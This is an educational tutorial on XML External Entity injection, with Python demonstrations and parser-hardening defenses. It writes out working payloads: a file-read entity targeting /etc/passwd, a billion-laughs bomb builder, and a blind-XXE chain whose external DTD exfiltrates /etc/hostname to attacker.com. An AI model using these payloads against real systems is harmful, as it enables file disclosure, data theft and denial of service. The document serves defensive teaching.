Detailed Explanation of XML External Entity (XXE) Injection Attacks

Description
XML External Entity (XXE) injection is a vulnerability in applications that parse untrusted XML with external entity resolution enabled. By supplying crafted external entity declarations, an attacker can read sensitive files, scan internal ports, perform Server-Side Request Forgery (SSRF), and, in some configurations, achieve remote code execution. The vulnerability commonly appears in applications that accept XML input, such as web services and document parsers.

Key Points Explained Step by Step

Review of XML Basic Structure
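- XML documents consist of a declaration, an optional document type definition (DTD), elements, and entities. An entity must be declared in the DTD before it is referenced. For example:
```
<?xml version="1.0"?>
<!DOCTYPE data [ <!ENTITY example "value"> ]>
<data>&example;</data>
```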
- Entities are either internal (<!ENTITY example "value">), whose value is given inline, or external (<!ENTITY example SYSTEM "file:///path">), whose value is loaded from the resource named after the SYSTEM keyword.
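
To see internal entity substitution in action, the following minimal Python sketch parses a small document that declares and references an internal entity, using the standard library's xml.etree.ElementTree. The names `DOCUMENT` and `expand_internal_entity` are illustrative and not part of any library.

```python
import xml.etree.ElementTree as ET

# Hypothetical sample document: declares an internal entity and references it.
DOCUMENT = """<?xml version="1.0"?>
<!DOCTYPE data [ <!ENTITY example "value"> ]>
<data>&example;</data>"""


def expand_internal_entity(xml_text: str) -> str:
    """Parse xml_text and return the root element's text after entity substitution."""
    root = ET.fromstring(xml_text)
    return root.text or ""


if __name__ == "__main__":
    # The parser substitutes the declared value for &example; before
    # the application ever sees the element text.
    print(expand_internal_entity(DOCUMENT))
```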

XXE Attack Principle
- When the XML parser is improperly configured (e.g., with external entity resolution enabled) and processes attacker-controlled XML, the attacker can declare a malicious entity in the document's DOCTYPE:
```
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE payload [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>
```
- The parser replaces &xxe; with the contents of the /etc/passwd file. If the application returns the parsed value in its response, the file is disclosed to the attacker.
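
The substitution described above can be reproduced safely against a throwaway file. The sketch below is a minimal illustration in Python, assuming the standard library's xml.sax parser; `TextCollector`, `parse_text`, `build_payload`, and the file name secret.txt are hypothetical names introduced here. It parses the same payload twice: once with external general entities enabled (the misconfiguration) and once with them disabled (the default since Python 3.7.1).

```python
import io
import tempfile
import xml.sax
from pathlib import Path
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collects all character data seen while parsing."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_text(xml_bytes: bytes, resolve_external: bool) -> str:
    """Parse xml_bytes and return its text; resolve_external toggles the risky setting."""
    parser = xml.sax.make_parser()
    # True recreates the misconfiguration; False is the safe setting.
    parser.setFeature(feature_external_ges, resolve_external)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.chunks)


def build_payload(target: Path) -> bytes:
    """Build an XXE document whose entity points at target (a harmless local file)."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!DOCTYPE payload [ <!ENTITY xxe SYSTEM "{target.as_uri()}"> ]>\n'
        "<data>&xxe;</data>"
    ).encode("utf-8")


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        secret = Path(tmp) / "secret.txt"
        secret.write_text("top-secret-token", encoding="utf-8")
        payload = build_payload(secret)
        print("misconfigured:", repr(parse_text(payload, resolve_external=True)))
        print("safe setting: ", repr(parse_text(payload, resolve_external=False)))
```

With the feature enabled, the file's contents appear in the parsed text; with it disabled, the entity reference contributes nothing.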

Attack Scenario Classification
- Classic File Read: Read server files via the file:// protocol.
- SSRF Attack: Use the http:// protocol to make the server send requests to internal systems (e.g., http://192.168.1.1:8080).
- Blind XXE: When responses do not directly return data, leak information through out-of-band channels (e.g., DNS logs).
- DoS Attack: Exhaust server memory and CPU through nested entity expansion, where each entity references the previous one several times (e.g., the "billion laughs" XML bomb).
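
The arithmetic behind the DoS scenario is worth making concrete: a document of a few hundred bytes can expand to gigabytes. The sketch below is a rough illustration in Python; `expanded_size`, `build_bomb`, and the entity names e0, e1, and so on are hypothetical. It computes the expanded size without expanding anything, and only parses a deliberately tiny instance.

```python
import xml.etree.ElementTree as ET


def expanded_size(base_length: int, fanout: int, levels: int) -> int:
    """Return the size of the fully expanded top-level entity.

    Level 0 is a literal string of base_length characters; each later
    level references the previous level `fanout` times.
    """
    return base_length * fanout ** levels


def build_bomb(base: str, fanout: int, levels: int) -> str:
    """Build a nested-entity document with the given shape (does not parse it)."""
    decls = [f'<!ENTITY e0 "{base}">']
    for level in range(1, levels + 1):
        refs = f"&e{level - 1};" * fanout
        decls.append(f'<!ENTITY e{level} "{refs}">')
    body = "\n  ".join(decls)
    return f"<!DOCTYPE data [\n  {body}\n]>\n<data>&e{levels};</data>"


if __name__ == "__main__":
    # Classic shape: a 3-character string, 10 references per level, 9 levels.
    doc = build_bomb("lol", fanout=10, levels=9)
    print(len(doc), "characters of XML expand to", expanded_size(3, 10, 9))

    # A tiny instance (2 references per level, 3 levels) is safe to parse.
    tiny = ET.fromstring(build_bomb("ab", fanout=2, levels=3))
    print(len(tiny.text), "characters after expansion")
```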

Defense Measures
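- Disable DTDs and External Entities:
  - PHP: Since PHP 8.0 (which requires libxml2 2.9.0 or later), external entity loading is disabled by default and libxml_disable_entity_loader() is deprecated. On older versions, call libxml_disable_entity_loader(true). In all versions, avoid passing LIBXML_NOENT or LIBXML_DTDLOAD to the parser.
  - Java: Set the feature http://apache.org/xml/features/disallow-doctype-decl to true on the parser factory. XMLConstants.FEATURE_SECURE_PROCESSING on its own is not a reliable XXE defense across parser implementations.
- Use Alternative Formats such as JSON where possible. XSD validation constrains document structure but does not by itself stop entity resolution, which happens during parsing, so it complements the parser settings rather than replacing them.
- Whitelist Filtering: Reject input that contains a DOCTYPE declaration when the application does not need DTDs. Treat string-based filtering as a secondary layer, since it can be bypassed (for example, with alternate encodings).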
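
The "reject DOCTYPE" defense can be enforced at the parser level rather than with string matching. The following is a minimal sketch in Python, assuming the standard library's expat bindings; `DoctypeForbidden`, `_forbid_doctype`, and `safe_fromstring` are hypothetical names, not an existing API. It is one possible approach, not a complete hardening recipe.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when untrusted XML contains a DOCTYPE declaration."""


def _forbid_doctype(name, system_id, public_id, has_internal_subset):
    # expat calls this handler as soon as it encounters a DOCTYPE declaration.
    raise DoctypeForbidden(f"DOCTYPE declaration for {name!r} is not allowed")


def safe_fromstring(xml_bytes: bytes) -> ET.Element:
    """Parse xml_bytes only if it contains no DOCTYPE declaration."""
    # First pass: a bare expat parser whose only job is to reject DTDs.
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _forbid_doctype
    checker.Parse(xml_bytes, True)
    # Second pass: with no DTD present, the document cannot declare entities.
    return ET.fromstring(xml_bytes)


if __name__ == "__main__":
    print(safe_fromstring(b"<data>ok</data>").text)
    try:
        safe_fromstring(
            b'<!DOCTYPE payload [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
            b"<data>&xxe;</data>"
        )
    except DoctypeForbidden as exc:
        print("rejected:", exc)
```

Parsing twice costs some performance; the trade-off is that the check relies on the parser's own tokenizer, so it is not fooled by encodings or whitespace tricks that defeat substring checks.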

Example: Steps for Exploiting Blind XXE

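The attacker hosts a DTD file (e.g., http://attacker.com/malicious.dtd). Inside the entity value, the percent sign of the nested declaration is written as &#x25; because a literal % is not allowed there:

<!ENTITY % exfil SYSTEM "file:///etc/hostname">
<!ENTITY % send "<!ENTITY &#x25; result SYSTEM 'http://attacker.com/?data=%exfil;'>">

The attacker then injects XML that loads the external DTD and references its parameter entities in order:

<!DOCTYPE data [
  <!ENTITY % dtd SYSTEM "http://attacker.com/malicious.dtd">
  %dtd;
  %send;
  %result;
]>
<data/>

When the server parses this, %dtd; loads the attacker's DTD, %send; declares the result entity with the file content embedded in its URL, and %result; makes the server request that URL. The attacker reads the file content from their own server's request log, achieving data exfiltration.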

By understanding the XML parsing mechanism and the attack chain, one can effectively configure parsers or adopt secure development practices to block XXE vulnerabilities.